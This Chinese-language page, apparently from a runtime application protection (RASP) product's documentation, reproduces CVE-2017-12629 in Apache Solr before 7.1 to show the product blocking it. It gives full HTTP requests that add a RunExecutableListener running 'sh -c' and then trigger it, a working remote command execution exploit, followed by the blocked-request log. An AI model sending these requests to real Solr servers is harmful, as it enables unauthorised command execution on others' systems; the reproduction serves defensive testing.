RASP安全技术

# CVE-2017-12629

# 漏洞简介

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。 原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。 7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)

# 影响版本

Apache Solr < 7.1

Apache Lucene < 7.1(很多组件都用到这个,比如ES)

# 复现环境

# 下载Solr

solr 7.0.1 (opens new window)

# 启动Solr

 bin/solr start
1

这样就可以在后台启动Solr,并监听8983端口,启动脚本会检查启动的正确性并返回提示信息到控制台。 这时就可以通过浏览器来访问管理控制台(http://localhost:8983/solr/)。

# 创建Core

如果没有使用示例配置,为了能够建立索引和查询,这里必须创建一个Core

bin/solr create -c Urahara # Urahara为你要创建的Core的名称
1

# 添加文档

这时候Solr中还是空的,我们需要添加一些文档以便进行索引。在example/目录的子目录下有不同的类型。

bin/post -c Urahara example/exampledocs/*.xml
1
 solr-7.0.1 bin/post -c Urahara example/exampledocs/*.xml
/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/java -classpath /Users/xxxx/Downloads/solr-7.0.1/dist/solr-core-7.0.1.jar -Dauto=yes -Dc=Urahara -Ddata=files org.apache.solr.util.SimplePostTool example/exampledocs/gb18030-example.xml example/exampledocs/hd.xml example/exampledocs/ipod_other.xml example/exampledocs/ipod_video.xml example/exampledocs/manufacturers.xml example/exampledocs/mem.xml example/exampledocs/money.xml example/exampledocs/monitor.xml example/exampledocs/monitor2.xml example/exampledocs/mp500.xml example/exampledocs/sd500.xml example/exampledocs/solr.xml example/exampledocs/utf8-example.xml example/exampledocs/vidcard.xml
SimplePostTool version 5.0.0
Posting files to [base] url http://localhost:8983/solr/Urahara/update...
Entering auto mode. File endings considered are xml,json,jsonl,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log
POSTing file gb18030-example.xml (application/xml) to [base]
POSTing file hd.xml (application/xml) to [base]
POSTing file ipod_other.xml (application/xml) to [base]
POSTing file ipod_video.xml (application/xml) to [base]
POSTing file manufacturers.xml (application/xml) to [base]
POSTing file mem.xml (application/xml) to [base]
POSTing file money.xml (application/xml) to [base]
POSTing file monitor.xml (application/xml) to [base]
POSTing file monitor2.xml (application/xml) to [base]
POSTing file mp500.xml (application/xml) to [base]
POSTing file sd500.xml (application/xml) to [base]
POSTing file solr.xml (application/xml) to [base]
POSTing file utf8-example.xml (application/xml) to [base]
POSTing file vidcard.xml (application/xml) to [base]
14 files indexed.
COMMITting Solr index changes to http://localhost:8983/solr/Urahara/update...
Time spent: 0:00:00.170
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

完成上述操作Solr就已经为这些文档建立索引并包含在这些文件中。

# 发起攻击

# 创建listener

首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:

POST /solr/Urahara/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
1
2
3
4
5
6
7
8
9

关键命令

{
    "add-listener":{
        "event":"postCommit",
        "name":"newlistener",
        "class":"solr.RunExecutableListener",
        "exe":"sh",
        "dir":"/bin/",
        "args":[
            "-c",
            "touch /tmp/success"
        ]
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13

使用postman 发送上面的请求

img.png

# update

然后进行update操作,触发刚才添加的listener:

POST /solr/Urahara/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]
1
2
3
4
5
6
7
8
9
10

# 执行结果

/tmp/success 文件创建成功

# RASP防护

开启RASP防护,再次发起请求 。请求已经被阻断,RASP防护生效。

{
  "cmdArray":[
    "sh",
    "-c",
    "touch /tmp/success"
  ],
  "stackTrace":[
    "java.lang.ProcessImpl.start(ProcessImpl.java)",
    "java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)",
    "java.lang.Runtime.exec(Runtime.java:621)",
    "org.apache.solr.core.RunExecutableListener.exec(RunExecutableListener.java:98)",
    "org.apache.solr.core.RunExecutableListener.postCommit(RunExecutableListener.java:137)",
    "org.apache.solr.update.UpdateHandler.callPostCommitCallbacks(UpdateHandler.java:99)",
    "org.apache.solr.update.DirectUpdateHandler2.commit(DirectUpdateHandler2.java:686)",
    "org.apache.solr.update.CommitTracker.run(CommitTracker.java:222)",
    "java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)",
    "java.util.concurrent.FutureTask.run(FutureTask.java:266)",
    "java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)",
    "java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)",
    "java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)",
    "java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)",
    "java.lang.Thread.run(Thread.java:748)"
  ]
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

2021-10-11 06:11:44 INFO method: ProcessImpl.start.before, 耗时: 0.270498 ms

CVE-2017-8046